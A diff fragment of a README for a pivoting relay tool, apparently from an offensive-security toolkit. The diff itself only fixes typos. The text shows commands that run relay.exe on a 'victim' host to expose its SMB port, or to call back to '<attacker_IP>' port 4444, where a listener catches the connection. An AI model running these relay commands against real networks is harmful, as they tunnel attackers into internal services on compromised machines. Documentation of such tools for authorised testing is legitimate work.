Blackfell/python_widgets/README.md

 C:\> relay.exe -c 127.0.0.1 445 -l 5555
 ```

-And you'll be able to connect straight up to the victim port 5555 to get SMB access; similarly, if all inbound is filetered, you could run a call back relay.
+And you'll be able to connect straight up to the victim port 5555 to get SMB access; similarly, if all inbound is filtered, you could run a call back relay.
 On your attacker:

 ```
 attacker@attacker ~$ relay.py -l 4444 -l 9999 -v -t
 ```

-This will set up a loacl relay to catch the callback and serve relay traffic to port 9999; the v and t tags make the tool vun verbosely and tee all data to the console respectively.
+This will set up a local relay to catch the callback and serve relay traffic to port 9999; the *-v* and *-t* tags make the tool vun verbosely and tee all data to the console respectively.
 Now execute a callback relay from the victim:

 ```
 C:\relay.exe -c 127.0.0.1 445 -c <attacker_IP> 4444